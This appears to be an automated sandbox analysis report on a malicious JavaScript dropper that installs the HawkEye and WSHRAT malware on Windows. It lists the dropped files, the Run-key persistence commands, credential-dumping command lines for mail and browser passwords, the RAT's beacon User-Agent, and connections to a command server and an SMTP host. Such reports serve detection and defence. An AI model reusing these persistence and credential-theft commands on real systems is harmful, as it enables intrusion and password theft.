Analysis Overview
SHA256
052a6543d8392cf4c54e7f88f80b41f571ea4e937e3caa6fa9b42a860b40b30c
Threat Level: Known bad
The file Scano005110.js was found to be: Known bad.
Malicious Activity Summary
HawkEye
WSHRAT
NirSoft MailPassView
NirSoft WebBrowserPassView
Nirsoft
Blocklisted process makes network request
Executes dropped EXE
Uses the VBS compiler for execution
Drops startup file
Loads dropped DLL
Looks up external IP address via web service
Adds Run key to start application
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Kills process with taskkill
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Script User-Agent
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-09-29 04:13
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2021-09-29 04:13
Reported
2021-09-29 04:17
Platform
win7v20210408
Max time kernel
150s
Max time network
181s
Command Line
Signatures
HawkEye
WSHRAT
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fthost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Windows Update.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scano005110.js | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scano005110.js | C:\Windows\system32\wscript.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fthost.exe | N/A |
Uses the VBS compiler for execution
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\Scano005110 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\Scano005110.js\"" | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scano005110 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\Scano005110.js\"" | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" | C:\Users\Admin\AppData\Roaming\Windows Update.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | whatismyipaddress.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1308 set thread context of 1836 | N/A | C:\Users\Admin\AppData\Roaming\Windows Update.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe |
| PID 1308 set thread context of 396 | N/A | C:\Users\Admin\AppData\Roaming\Windows Update.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe |
Enumerates physical storage devices
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Windows Update.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Windows Update.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Windows Update.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Scano005110.js
C:\Users\Admin\AppData\Local\Temp\fthost.exe
"C:\Users\Admin\AppData\Local\Temp\fthost.exe"
C:\Users\Admin\AppData\Roaming\Windows Update.exe
"C:\Users\Admin\AppData\Roaming\Windows Update.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | astatech-cn.com | udp |
| GB | 78.110.166.82:80 | astatech-cn.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 8.8.8.8:53 | whatismyipaddress.com | udp |
| US | 104.16.154.36:80 | whatismyipaddress.com | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 8.8.8.8:53 | mail.legacypharma.com.pk | udp |
| DE | 49.12.122.233:587 | mail.legacypharma.com.pk | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| DE | 49.12.122.233:587 | mail.legacypharma.com.pk | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
Files
memory/828-59-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\fthost.exe
| MD5 | a0f830df411d0bd29cc9417c61e32be5 |
| SHA1 | c03c055c20f08ff9da4ccb56433c722eb981d088 |
| SHA256 | ded7aa698a9f7a28de12e9a68e69b8fa666474af3e85ca8e2b133cb6ad8cdcfa |
| SHA512 | e774634596b5b007445e6a1b75f40e178125c71fee4d6bd61f55c03f8f5e3f8f3ccabbf369781e9a0a76fe09e93e06b89943614c5c59d091b699488406c5bf2e |
C:\Users\Admin\AppData\Local\Temp\fthost.exe
| MD5 | a0f830df411d0bd29cc9417c61e32be5 |
| SHA1 | c03c055c20f08ff9da4ccb56433c722eb981d088 |
| SHA256 | ded7aa698a9f7a28de12e9a68e69b8fa666474af3e85ca8e2b133cb6ad8cdcfa |
| SHA512 | e774634596b5b007445e6a1b75f40e178125c71fee4d6bd61f55c03f8f5e3f8f3ccabbf369781e9a0a76fe09e93e06b89943614c5c59d091b699488406c5bf2e |
memory/828-62-0x0000000074D91000-0x0000000074D93000-memory.dmp
memory/828-63-0x00000000005B0000-0x00000000005B1000-memory.dmp
\Users\Admin\AppData\Roaming\Windows Update.exe
| MD5 | a0f830df411d0bd29cc9417c61e32be5 |
| SHA1 | c03c055c20f08ff9da4ccb56433c722eb981d088 |
| SHA256 | ded7aa698a9f7a28de12e9a68e69b8fa666474af3e85ca8e2b133cb6ad8cdcfa |
| SHA512 | e774634596b5b007445e6a1b75f40e178125c71fee4d6bd61f55c03f8f5e3f8f3ccabbf369781e9a0a76fe09e93e06b89943614c5c59d091b699488406c5bf2e |
memory/1308-65-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Windows Update.exe
| MD5 | a0f830df411d0bd29cc9417c61e32be5 |
| SHA1 | c03c055c20f08ff9da4ccb56433c722eb981d088 |
| SHA256 | ded7aa698a9f7a28de12e9a68e69b8fa666474af3e85ca8e2b133cb6ad8cdcfa |
| SHA512 | e774634596b5b007445e6a1b75f40e178125c71fee4d6bd61f55c03f8f5e3f8f3ccabbf369781e9a0a76fe09e93e06b89943614c5c59d091b699488406c5bf2e |
C:\Users\Admin\AppData\Roaming\Windows Update.exe
| MD5 | a0f830df411d0bd29cc9417c61e32be5 |
| SHA1 | c03c055c20f08ff9da4ccb56433c722eb981d088 |
| SHA256 | ded7aa698a9f7a28de12e9a68e69b8fa666474af3e85ca8e2b133cb6ad8cdcfa |
| SHA512 | e774634596b5b007445e6a1b75f40e178125c71fee4d6bd61f55c03f8f5e3f8f3ccabbf369781e9a0a76fe09e93e06b89943614c5c59d091b699488406c5bf2e |
memory/1308-69-0x0000000000350000-0x0000000000351000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SysInfo.txt
| MD5 | 3c77678429c241c59376b4b284bfa90f |
| SHA1 | 5e23f969a6e5071334c2fff7c1a5cc8b4a1f0633 |
| SHA256 | d4408efc9b2e8d03cc3ed7234204c241acd033aa6014ae1804c1df3ffcc8e9f1 |
| SHA512 | f8853fbe92f7b3cf13270ebbcc281226a59a522c8b9dc6b87f9c74168f4dec8eb4db7f952887cf86591bbfbce9768c14d4dec75af41200842ac5611a4fe7a0c1 |
memory/1308-71-0x0000000000366000-0x0000000000367000-memory.dmp
memory/1836-72-0x0000000000400000-0x000000000041B000-memory.dmp
memory/1836-73-0x0000000000411654-mapping.dmp
memory/1836-75-0x0000000000400000-0x000000000041B000-memory.dmp
memory/396-77-0x0000000000442628-mapping.dmp
memory/396-76-0x0000000000400000-0x0000000000458000-memory.dmp
memory/396-79-0x0000000000400000-0x0000000000458000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\holderwb.txt
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
Analysis: behavioral2
Detonation Overview
Submitted
2021-09-29 04:13
Reported
2021-09-29 04:16
Platform
win10-en-20210920
Max time kernel
147s
Max time network
155s
Command Line
Signatures
HawkEye
WSHRAT
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fthost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Windows Update.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cmdc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cmdc.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scano005110.js | C:\Windows\system32\wscript.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scano005110.js | C:\Windows\system32\wscript.exe | N/A |
Uses the VBS compiler for execution
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Scano005110 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\Scano005110.js\"" | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scano005110 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\Scano005110.js\"" | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" | C:\Users\Admin\AppData\Roaming\Windows Update.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | whatismyipaddress.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2004 set thread context of 1972 | N/A | C:\Users\Admin\AppData\Roaming\Windows Update.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe |
| PID 2004 set thread context of 600 | N/A | C:\Users\Admin\AppData\Roaming\Windows Update.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Windows Update.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Windows Update.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Windows Update.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Scano005110.js
C:\Users\Admin\AppData\Local\Temp\fthost.exe
"C:\Users\Admin\AppData\Local\Temp\fthost.exe"
C:\Users\Admin\AppData\Roaming\Windows Update.exe
"C:\Users\Admin\AppData\Roaming\Windows Update.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
